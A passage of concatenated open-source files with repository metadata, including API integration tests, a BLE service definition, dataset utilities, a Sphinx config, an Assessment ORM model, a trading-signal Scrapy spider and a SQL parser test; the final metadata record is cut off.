assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user and user['access'] == 'rw'
# Remove user from project permissions
r = as_admin.delete('/groups/' + group + '/permissions/' + user_id, json=payload, params={'propagate': 'true'})
assert r.ok
r = as_admin.get('/groups/' + group)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
r = as_admin.get('/projects/' + project)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
r = as_admin.get('/sessions/' + session)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
r = as_admin.get('/acquisitions/' + acquisition)
perms = r.json()['permissions']
user = get_user_in_perms(perms, user_id)
assert r.ok and user is None
# Delete empty project 2
r= as_admin.delete('/projects/' + project2)
assert r.ok
# Test tag pool renaming and deletion
def test_add_rename_remove_group_tag(data_builder, as_admin):
"""
Tests:
- propagation from the group level
- renaming tag at group level renames tags in hierarchy
- deleting tag at group level renames tags in hierarchy
"""
group = data_builder.create_group()
project = data_builder.create_project()
session = data_builder.create_session()
acquisition = data_builder.create_acquisition()
tag = 'test tag'
tag_renamed = 'test tag please ignore'
# Add tag to hierarchy
payload = {'value': tag}
r = as_admin.post('/groups/' + group + '/tags', json=payload)
assert r.ok
r = as_admin.post('/projects/' + project + '/tags', json=payload)
assert r.ok
r = as_admin.post('/sessions/' + session + '/tags', json=payload)
assert r.ok
r = as_admin.post('/acquisitions/' + acquisition + '/tags', json=payload)
assert r.ok
r = as_admin.get('/groups/' + group)
assert r.ok and tag in r.json()['tags']
r = as_admin.get('/projects/' + project)
assert r.ok and tag in r.json()['tags']
r = as_admin.get('/sessions/' + session)
assert r.ok and tag in r.json()['tags']
r = as_admin.get('/acquisitions/' + acquisition)
assert r.ok and tag in r.json()['tags']
# Rename tag
payload = {'value': tag_renamed}
r = as_admin.put('/groups/' + group + '/tags/' + tag, json=payload)
assert r.ok
r = as_admin.get('/groups/' + group)
assert r.ok and tag_renamed in r.json()['tags']
r = as_admin.get('/projects/' + project)
assert r.ok and tag_renamed in r.json()['tags']
r = as_admin.get('/sessions/' + session)
assert r.ok and tag_renamed in r.json()['tags']
r = as_admin.get('/acquisitions/' + acquisition)
assert r.ok and tag_renamed in r.json()['tags']
# Delete tag
r = as_admin.delete('/groups/' + group + '/tags/' + tag_renamed)
assert r.ok
r = as_admin.get('/groups/' + group)
assert r.ok and tag_renamed not in r.json()['tags']
r = as_admin.get('/projects/' + project)
assert r.ok and tag_renamed not in r.json()['tags']
r = as_admin.get('/sessions/' + session)
assert r.ok and tag_renamed not in r.json()['tags']
r = as_admin.get('/acquisitions/' + acquisition)
assert r.ok and tag_renamed not in r.json()['tags']
|
{
"content_hash": "e85015f100a37ece425a203d6446d038",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 115,
"avg_line_length": 33.55161290322581,
"alnum_prop": 0.6216709931737333,
"repo_name": "scitran/api",
"id": "2dd69a9a4545cb95b50291a577dec4fd615bb04c",
"size": "10440",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/integration_tests/python/test_propagation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "236479"
},
{
"name": "Shell",
"bytes": "12550"
}
],
"symlink_target": ""
}
|
import ble
import uuids
cateye_base='-ceed-1000-8000-00805f9b34fb'
class CateyeService(ble.Service):
uuid_def=('00004001'+cateye_base,'cateye_service','Cateye Service')
|
{
"content_hash": "7be52912383e14f5d4d11fef69157682",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 71,
"avg_line_length": 25,
"alnum_prop": 0.76,
"repo_name": "markrages/ble",
"id": "a55e559ce284e38b6a36d1215217fb70814922ca",
"size": "195",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "profiles/cateye_service.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57748"
},
{
"name": "Shell",
"bytes": "437"
}
],
"symlink_target": ""
}
|
import unittest
from tests.unit.test_account import TestAccount
from tests.unit.test_application import TestApplication
from tests.unit.test_usages import TestUsages
from tests.unit.test_conferences import TestConferences
from tests.unit.test_mms_messages import TestMmsMessages
from tests.unit.test_sms_messages import TestSmsMessages
from tests.unit.test_calls import TestCalls
from tests.unit.test_transcriptions import TestTranscriptions
from tests.unit.test_sip_domain import TestSipDomain
from tests.unit.test_sip_credentials import TestSipCredentials
from tests.unit.test_recordings import TestRecordings
from tests.unit.test_notifications import TestNotifications
from tests.unit.test_application_clients import TestApplicationClients
from tests.unit.test_available_phone_number import TestAvailablePhoneNumber
from tests.unit.test_carrier_services import TestCarrierServices
from tests.unit.test_incoming_phone_numbers import TestIncomingPhoneNumbers
from tests.unit.test_ip_access_control_lists import TestIpAccessControlLists
from tests.unit.fraud_control_test import FraudControlTest
def suite():
"""
Gather all the tests from this module in a test suite.
"""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(FraudControlTest))
test_suite.addTest(unittest.makeSuite(TestIpAccessControlLists))
test_suite.addTest(unittest.makeSuite(TestIncomingPhoneNumbers))
test_suite.addTest(unittest.makeSuite(TestAvailablePhoneNumber))
test_suite.addTest(unittest.makeSuite(TestApplicationClients))
test_suite.addTest(unittest.makeSuite(TestCarrierServices))
test_suite.addTest(unittest.makeSuite(TestNotifications))
test_suite.addTest(unittest.makeSuite(TestRecordings))
test_suite.addTest(unittest.makeSuite(TestSipCredentials))
test_suite.addTest(unittest.makeSuite(TestSipDomain))
test_suite.addTest(unittest.makeSuite(TestTranscriptions))
test_suite.addTest(unittest.makeSuite(TestCalls))
test_suite.addTest(unittest.makeSuite(TestMmsMessages))
test_suite.addTest(unittest.makeSuite(TestSmsMessages))
test_suite.addTest(unittest.makeSuite(TestConferences))
test_suite.addTest(unittest.makeSuite(TestUsages))
test_suite.addTest(unittest.makeSuite(TestAccount))
test_suite.addTest(unittest.makeSuite(TestApplication))
return test_suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
test_suite = suite()
runner.run(test_suite)
|
{
"content_hash": "c3e032d6492987cd048b839d4118716e",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 76,
"avg_line_length": 48.6078431372549,
"alnum_prop": 0.8104074223477209,
"repo_name": "jaymin-panchal/zang-python",
"id": "ebb36f491c315700e82d95483ecfc1489b55b959",
"size": "2479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/unit_test_suit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "344686"
}
],
"symlink_target": ""
}
|
from pathlib import Path
import pickle
import json
import torchaudio
import progressbar
import argparse
import os
import matplotlib
matplotlib.use('agg')
def get_all_metadata(path_dir, suffix="_metadata.json"):
out = []
for root, dirs, filenames in os.walk(path_dir):
for f in filenames:
if f.endswith(suffix):
out.append(os.path.join(root, f))
return out
def get_base_name_from_metadata(path):
return os.path.basename(path)[:-14]
def get_zip_name(pathMetadata):
return f'{get_base_name_from_metadata(pathMetadata)}.zip'
def get_wav_name(pathMetadata):
return get_base_name_from_metadata(pathMetadata).replace('64kb_mp3', 'wav')
def get_txt_name(pathMetadata):
return f'{get_base_name_from_metadata(pathMetadata)}_text.txt'
def get_speaker_data_name(pathMetadata):
return f'{get_base_name_from_metadata(pathMetadata)}_speaker_data.json'
def getJSON(pathJSON):
with open(pathJSON, 'rb') as file:
return json.load(file)
def get_updated_metadata(update, path_dir_in, path_dir_out, tag):
print(f"Updating metadata with tag {tag}")
n_items = len(update)
bar = progressbar.ProgressBar(maxval=n_items)
bar.start()
for index, item in enumerate(update):
bar.update(index)
metadada_name, new_value = item
full_path = Path(path_dir_in) / metadada_name
with open(str(full_path), 'rb') as file:
data = json.load(file)
data[tag] = new_value
out_path = Path(path_dir_out) / metadada_name
with open(str(out_path), 'w') as file:
data = json.dump(data, file, indent=2)
bar.finish()
def save_cache(path_cache, data):
path_cache = Path(path_cache)
print(f"Saving a cache at {path_cache}")
extension = path_cache.suffix
if extension == ".json":
with open(path_cache, 'w') as file:
return json.dump(data, file, indent=2)
elif extension == ".pkl":
with open(path_cache, 'wb') as file:
pickle.dump(data, file)
else:
raise ValueError(f"{extension} : Invalid format")
def load_cache(path_cache, fallback_function, args=None,
save=True, ignore_cache=False):
path_cache = Path(path_cache)
if not path_cache.is_file() or ignore_cache:
print(f"No cache found at {path_cache}")
else:
print(f"Loading the cached data at {path_cache}...")
extension = path_cache.suffix
if extension == ".json":
try:
with open(path_cache, 'rb') as file:
return json.load(file)
except json.decoder.JSONDecodeError:
print("Invalid cache.")
elif extension == ".pkl":
try:
with open(path_cache, 'rb') as file:
return pickle.load(file)
except pickle.UnpicklingError:
print("Invalid cache.")
else:
raise ValueError(f"{extension} : Invalid format")
out = fallback_function(*args)
if save:
save_cache(path_cache, out)
return out
def strToHours(inputStr):
hours, minutes, sec = map(float, inputStr.split(':'))
return hours + minutes / 60.0 + sec / 3600.0
def getTotalTime(path_dir, list_metadata):
totTime = 0
for metadata in list_metadata:
fullPath = os.path.join(path_dir, metadata)
with open(fullPath) as file:
data = json.load(file)
try:
size = strToHours(data['totaltime'])
totTime += size
except:
continue
return totTime
def get_speakers(pathSpeakerdata):
with open(pathSpeakerdata, 'rb') as file:
data = json.load(file)
outData = set()
if data["names"] is None or data["readers"] is None:
return outData
for items in data["readers"]:
if items is not None:
outData |= set(items)
return outData
def get_all_speakers(path_dir, list_metadata):
outSpeakers = set()
for metadata in list_metadata:
fullPath = os.path.join(path_dir, get_speaker_data_name(metadata))
outSpeakers |= get_speakers(fullPath)
return outSpeakers
def get_speaker_data(path_dir, list_metadata, pathWav):
speakerTalk = {}
nData = len(list_metadata)
multiples = 0
bar = progressbar.ProgressBar(maxval=nData)
bar.start()
for nM, metadataName in enumerate(list_metadata):
bar.update(nM)
zipName = get_zip_name(metadataName)
wavName = zipName.replace("64kb_mp3.zip", "wav")
speakerData = getJSON(os.path.join(path_dir,
get_speaker_data_name(metadataName)))
dirWav = os.path.join(pathWav, wavName)
if not os.path.isdir(dirWav):
continue
listWav = [f'{f}.wav' for f in speakerData["names"]]
for index, wavFile in enumerate(listWav):
locPath = os.path.join(dirWav, wavFile)
if not os.path.isfile(locPath):
continue
info = torchaudio.info(locPath)
size = (info[0].length / info[0].rate) / 3600
speakers = speakerData['readers'][index]
if speakers is None:
speakers = ['null']
if len(speakers) > 1:
multiples += size
for IDspeaker in speakers:
if IDspeaker not in speakerTalk:
speakerTalk[IDspeaker] = 0
speakerTalk[IDspeaker] += size
bar.finish()
return speakerTalk, multiples
def get_speaker_hours_data(list_metadata, audio_extension):
speakerTalk = {}
nData = len(list_metadata)
bar = progressbar.ProgressBar(maxval=nData)
bar.start()
for index, pathMetadata in enumerate(list_metadata):
bar.update(index)
with open(pathMetadata, 'rb') as file:
locMetadata = json.load(file)
speaker_name = locMetadata['speaker']
path_audio_data = os.path.splitext(pathMetadata)[0] + audio_extension
info = torchaudio.info(path_audio_data)[0]
totAudio = info.length / (info.rate * 3600.)
if speaker_name is None:
speaker_name = 'null'
if speaker_name not in speakerTalk:
speakerTalk[speaker_name] = 0
speakerTalk[speaker_name] += totAudio
bar.finish()
return speakerTalk
def get_hour_tag_repartition(list_metadata, tagName,
audio_extension):
nItems = len(list_metadata)
tags = {}
bar = progressbar.ProgressBar(maxval=nItems)
bar.start()
for index, pathMetadata in enumerate(list_metadata):
bar.update(index)
with open(pathMetadata, 'rb') as file:
locMetadata = json.load(file)
value = locMetadata['book_meta'][tagName]
path_audio_data = os.path.splitext(pathMetadata)[0] + audio_extension
info = torchaudio.info(path_audio_data)[0]
totAudio = info.length / (info.rate * 3600.)
if value is None:
value = 'null'
if not isinstance(value, list):
value = [value]
full_tag = '+'.join(value)
if full_tag not in tags:
tags[full_tag] = 0
tags[full_tag] += totAudio
bar.finish()
return tags
def get_tag_list(tagStats):
out = set()
for x in tagStats:
out = out.union(set(x.split('+')))
return out
def combine_reverse_foldings(f1, f2):
r"""
Compute f1 o f2
"""
return {x: f1.get(f2[x], f2[x]) for x in f2}
def build_reverse_folding(gender_folding):
out = {}
for key, val_list in gender_folding.items():
for val in val_list:
out[val] = key
return out
def apply_folding(tag_str, reverse_folding):
tag_list = tag_str.split('+')
new_tags = []
for tag in tag_list:
t = reverse_folding.get(tag, tag)
if t not in new_tags:
new_tags.append(t)
new_tags.sort()
return '+'.join(new_tags)
def remove_tag(tag_list, bad_tag, rescue_tag):
out = [x for x in tag_list if x != bad_tag]
if len(out) == 0:
out = [rescue_tag]
return out
def remove_multiple_tags(tag_str, order):
tag_list = tag_str.split('+')
return order[min([order.index(t) for t in tag_list])]
def get_metdata_from_id(path_dir, list_metadata, ID):
for index, name_metadata in enumerate(list_metadata):
pathMetadata = os.path.join(path_dir, name_metadata)
with open(pathMetadata, 'r') as file:
data = json.load(file)
if data["id"] == ID:
return data
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Dataset tools')
subparsers = parser.add_subparsers(dest='command')
parser_info = subparsers.add_parser('info')
parser_info.add_argument('path_dir', type=str)
args = parser.parse_args()
if args.command == 'info':
print("*"*50)
print(f"{args.path_dir} INFO :")
print("*"*50)
list_metadata = get_all_metadata(args.path_dir)
print(f"{len(list_metadata)} books found")
speakerList = get_all_speakers(args.path_dir, list_metadata)
print(f"{len(speakerList)} speakers")
time = getTotalTime(args.path_dir, list_metadata)
print(f"{time} hours of data")
|
{
"content_hash": "44ebb54190abb2d362f04f2a07006234",
"timestamp": "",
"source": "github",
"line_count": 362,
"max_line_length": 80,
"avg_line_length": 25.93646408839779,
"alnum_prop": 0.5956970923421024,
"repo_name": "facebookresearch/libri-light",
"id": "dcaaef008e0c079d3223e4d6accc9aa6d750907f",
"size": "9460",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "data_preparation/metadata_completion/utilities.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cython",
"bytes": "3385"
},
{
"name": "Python",
"bytes": "207420"
},
{
"name": "Shell",
"bytes": "396"
}
],
"symlink_target": ""
}
|
import socket
if __name__ == "__main__":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.43.12", 9000))
data = "some data"
sock.sendall(data)
result = sock.recv(1024)
print result
sock.close()
|
{
"content_hash": "03ee311ec777cc95a81a6e50b8f6641d",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 60,
"avg_line_length": 25.4,
"alnum_prop": 0.6141732283464567,
"repo_name": "kiran4399/beagleboat",
"id": "5d1206a492e1f3ab4365eddcf9402a1f19d2c17b",
"size": "254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "com/client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6349"
},
{
"name": "Matlab",
"bytes": "6028"
},
{
"name": "Python",
"bytes": "143764"
},
{
"name": "Shell",
"bytes": "95"
}
],
"symlink_target": ""
}
|
project = 'Basis Set Exchange'
copyright = '2020, Benjamin Pritchard and Susi Lehtola'
author = 'Benjamin Pritchard and Susi Lehtola'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinxcontrib.programoutput',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
#add_module_names = False
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'BasisSetExchangedoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'BasisSetExchange.tex', 'Basis Set Exchange Documentation',
'Benjamin Pritchard and Susi Lehtola', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'basissetexchange', 'Basis Set Exchange Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'BasisSetExchange', 'Basis Set Exchange Documentation',
author, 'BasisSetExchange', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
|
{
"content_hash": "8b9c05bfb2c9c143d9d501184bc22c2f",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 78,
"avg_line_length": 30.713286713286713,
"alnum_prop": 0.6559653916211293,
"repo_name": "MOLSSI-BSE/basis_set_exchange",
"id": "8e44dbddf65dbec628f7abccb6e8dabe6eff8f82",
"size": "5125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/conf.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "513196"
}
],
"symlink_target": ""
}
|
"""Module for Assessment object"""
from sqlalchemy import and_
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import remote
from sqlalchemy.orm import validates
from ggrc import db
from ggrc.models import reflection
from ggrc.models.audit import Audit
from ggrc.models.comment import Commentable
from ggrc.models.custom_attribute_definition import CustomAttributeDefinition
from ggrc.models.mixins import BusinessObject
from ggrc.models.mixins import CustomAttributable
from ggrc.models.mixins import FinishedDate
from ggrc.models.mixins import TestPlanned
from ggrc.models.mixins import Timeboxed
from ggrc.models.mixins import VerifiedDate
from ggrc.models.mixins import reminderable
from ggrc.models.mixins import statusable
from ggrc.models.mixins.assignable import Assignable
from ggrc.models.mixins.autostatuschangeable import AutoStatusChangeable
from ggrc.models.mixins.validate_on_complete import ValidateOnComplete
from ggrc.models.mixins.with_similarity_score import WithSimilarityScore
from ggrc.models.deferred import deferred
from ggrc.models.object_document import EvidenceURL
from ggrc.models.object_person import Personable
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.relationship import Relationship
from ggrc.models.track_object_state import HasObjectState
from ggrc.models.track_object_state import track_state_for_class
from ggrc.utils import similarity_options as similarity_options_module
class AuditRelationship(object):
"""Mixin for mandatory link to an Audit via Relationships."""
_aliases = {
"audit": {
"display_name": "Audit",
"mandatory": True,
"filter_by": "_filter_by_audit",
"ignore_on_update": True,
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
@classmethod
def _filter_by_audit(cls, predicate):
"""Get filter for objects related to an Audit."""
return Relationship.query.filter(
Relationship.source_type == cls.__name__,
Relationship.source_id == cls.id,
Relationship.destination_type == Audit.__name__,
).join(Audit, Relationship.destination_id == Audit.id).filter(
predicate(Audit.slug)
).exists() | Relationship.query.filter(
Relationship.destination_type == cls.__name__,
Relationship.destination_id == cls.id,
Relationship.source_type == Audit.__name__,
).join(Audit, Relationship.source_id == Audit.id).filter(
predicate(Audit.slug)
).exists()
class Assessment(statusable.Statusable, AuditRelationship,
AutoStatusChangeable, Assignable, HasObjectState, TestPlanned,
CustomAttributable, EvidenceURL, Commentable, Personable,
reminderable.Reminderable, Timeboxed, Relatable,
WithSimilarityScore, FinishedDate, VerifiedDate,
ValidateOnComplete, BusinessObject, db.Model):
"""Class representing Assessment.
Assessment is an object representing an individual assessment performed on
a specific object during an audit to ascertain whether or not
certain conditions were met for that object.
"""
__tablename__ = 'assessments'
_title_uniqueness = False
ASSIGNEE_TYPES = (u"Creator", u"Assessor", u"Verifier")
REMINDERABLE_HANDLERS = {
"statusToPerson": {
"handler":
reminderable.Reminderable.handle_state_to_person_reminder,
"data": {
statusable.Statusable.START_STATE: "Assessor",
"In Progress": "Assessor"
},
"reminders": {"assessment_assessor_reminder", }
}
}
design = deferred(db.Column(db.String), "Assessment")
operationally = deferred(db.Column(db.String), "Assessment")
@declared_attr
def object_level_definitions(self):
"""Set up a backref so that we can create an object level custom
attribute definition without the need to do a flush to get the
assessment id.
This is used in the relate_ca method in hooks/assessment.py.
"""
return db.relationship(
'CustomAttributeDefinition',
primaryjoin=lambda: and_(
remote(CustomAttributeDefinition.definition_id) == Assessment.id,
remote(CustomAttributeDefinition.definition_type) == "assessment"),
foreign_keys=[
CustomAttributeDefinition.definition_id,
CustomAttributeDefinition.definition_type
],
backref='assessment_definition',
cascade='all, delete-orphan')
object = {} # we add this for the sake of client side error checking
audit = {}
VALID_CONCLUSIONS = frozenset([
"Effective",
"Ineffective",
"Needs improvement",
"Not Applicable"
])
# REST properties
_publish_attrs = [
'design',
'operationally',
PublishOnly('audit'),
PublishOnly('object')
]
_tracked_attrs = {
'contact_id',
'description',
'design',
'notes',
'operationally',
'reference_url',
'secondary_contact_id',
'test_plan',
'title',
'url',
'start_date',
'end_date'
}
_aliases = {
"owners": None,
"assessment_object": {
"display_name": "Object",
"mandatory": True,
"ignore_on_update": True,
"filter_by": "_ignore_filter",
"type": reflection.AttributeInfo.Type.MAPPING,
"description": ("A single object that will be mapped to the audit.\n"
"Example:\n\nControl: Control-slug-1\n"
"Market : MARKET-55"),
},
"assessment_template": {
"display_name": "Template",
"ignore_on_update": True,
"filter_by": "_ignore_filter",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"url": "Assessment URL",
"design": "Conclusion: Design",
"operationally": "Conclusion: Operation",
"related_creators": {
"display_name": "Creator",
"mandatory": True,
"filter_by": "_filter_by_related_creators",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_assessors": {
"display_name": "Assessor",
"mandatory": True,
"filter_by": "_filter_by_related_assessors",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_verifiers": {
"display_name": "Verifier",
"filter_by": "_filter_by_related_verifiers",
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
similarity_options = similarity_options_module.ASSESSMENT
def validate_conclusion(self, value):
return value if value in self.VALID_CONCLUSIONS else ""
@validates("operationally")
def validate_opperationally(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@validates("design")
def validate_design(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@classmethod
def _filter_by_related_creators(cls, predicate):
return cls._get_relate_filter(predicate, "Creator")
@classmethod
def _filter_by_related_assessors(cls, predicate):
return cls._get_relate_filter(predicate, "Assessor")
@classmethod
def _filter_by_related_verifiers(cls, predicate):
return cls._get_relate_filter(predicate, "Verifier")
@classmethod
def _ignore_filter(cls, _):
return None
track_state_for_class(Assessment)
|
{
"content_hash": "84ba4020b0b8919df06b21a3bcccef53",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 79,
"avg_line_length": 33.34070796460177,
"alnum_prop": 0.6671532846715329,
"repo_name": "kr41/ggrc-core",
"id": "d651ee8592a3b4098304d2808df591bf40349f31",
"size": "7648",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/ggrc/models/assessment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "191076"
},
{
"name": "Cucumber",
"bytes": "136322"
},
{
"name": "HTML",
"bytes": "1079513"
},
{
"name": "JavaScript",
"bytes": "1718280"
},
{
"name": "Makefile",
"bytes": "7103"
},
{
"name": "Mako",
"bytes": "4320"
},
{
"name": "Python",
"bytes": "2389878"
},
{
"name": "Shell",
"bytes": "30802"
}
],
"symlink_target": ""
}
|
import scrapy
import talib
from mykgb import indicator
from myapp.models import *
from mykgb.items import *
class PriceDailySignalSpider(scrapy.Spider):
name = "price_daily_signal"
allowed_domains = ["www.sina.com"]
start_urls = ['http://www.sina.com/']
def parse(self, response):
# print(response.body)
Signal.objects.all().delete()
Signal.objects.update(macd=0, kdj=0, rsi=0, cci=0)
codes = Codeset.objects.filter(actived=True)
for code in codes:
qs = Price.objects.filter(code=code).order_by('date')
df = qs.to_dataframe(index='date')
macd = indicator.get_macd(df)
kdj = indicator.get_kdj(df)
rsi = indicator.get_rsi(df)
cci = indicator.get_cci(df)
signal, created = Signal.objects.update_or_create(code=code)
signal.macd = sum(macd.values())
signal.kdj = sum(kdj.values())
signal.rsi = sum(rsi.values())
signal.cci = sum(cci.values())
signal.save()
signal_msg = self.send_signal()
# sm("最新版内盘信号", signal_msg, self.receiver, self.msg_cc)
def send_signal(self):
signal = ''
df = Signal.objects.all().to_dataframe()
df['signal'] = df['macd'] + df['kdj'] + df['rsi'] + df['cci']
df = df[df['signal'] != 0].sort_values(by=['signal'], ascending=[-1])
print(df)
for index, row in df.iterrows():
if row['signal'] <= 0:
signal += u'<h3 STYLE="color:green;">做空 ' + row['code'] + u'强度:' + str(row['signal'])
'</h3>'
else:
signal += u'<h3 STYLE="color:red;">做多 ' + row['code'] + u'强度:' + str(row['signal'])
'</h3>'
signal += '<p>' + ' macd:' + str(row['macd']) + ' macd:' + str(row['kdj']) + ' kdj:' + str(
row['macd']) + ' rsi:' + str(row[
'rsi']) + ' cci:' + \
str(row['cci']) + '</p>'
return signal
|
{
"content_hash": "0caafa77227523e095af87fb0d906233",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 106,
"avg_line_length": 40.509803921568626,
"alnum_prop": 0.5033881897386253,
"repo_name": "back1992/mezzanine-api-docker",
"id": "c60be735018a6cf3ec87455728a7cfe25ff7d2ff",
"size": "2124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/mykgb/spiders/price_daily_signal.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1782"
},
{
"name": "Python",
"bytes": "90246"
},
{
"name": "Shell",
"bytes": "789"
}
],
"symlink_target": ""
}
|
import unittest
from mygrations.formats.mysql.file_reader.create_parser import CreateParser
class TableDifferenceTest(unittest.TestCase):
def test_simple_create(self):
a = CreateParser()
a.parse(
"""CREATE TABLE `tasks` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`account_id` int(10) DEFAULT NULL,
`task` varchar(255) DEFAULT NULL,
PRIMARY KEY (id)
);
"""
)
self.assertEquals(
str(a).replace("\n", ' '),
"CREATE TABLE `tasks` (`id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `account_id` INT(10), `task` VARCHAR(255), PRIMARY KEY (`id`));"
)
def test_with_constraints(self):
a = CreateParser()
a.parse(
"""CREATE TABLE `tasks` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`account_id` int(10) DEFAULT NULL,
PRIMARY KEY (id),
CONSTRAINT `tasks_fk` FOREIGN KEY (`account_id`) REFERENCES `accounts` (`id`) ON DELETE CASCADE
);
"""
)
self.assertEquals(
str(a).replace("\n", ' '),
"CREATE TABLE `tasks` (`id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `account_id` INT(10), PRIMARY KEY (`id`), CONSTRAINT `tasks_fk` FOREIGN KEY (`account_id`) REFERENCES `accounts` (`id`) ON DELETE CASCADE ON UPDATE RESTRICT);"
)
def test_with_options(self):
a = CreateParser()
a.parse(
"""CREATE TABLE `tasks` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`account_id` int(10) DEFAULT NULL,
`task` varchar(255) DEFAULT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
"""
)
self.assertEquals(
str(a).replace("\n", ' '),
"CREATE TABLE `tasks` (`id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT, `account_id` INT(10), `task` VARCHAR(255), PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;"
)
|
{
"content_hash": "1e35010b00ec399fc931d87d8a98fdd9",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 241,
"avg_line_length": 37.870370370370374,
"alnum_prop": 0.5491442542787286,
"repo_name": "cmancone/mygrations",
"id": "de3c4a4b6e7d76662c5afdf18fb4fe0467c1fd69",
"size": "2045",
"binary": false,
"copies": "1",
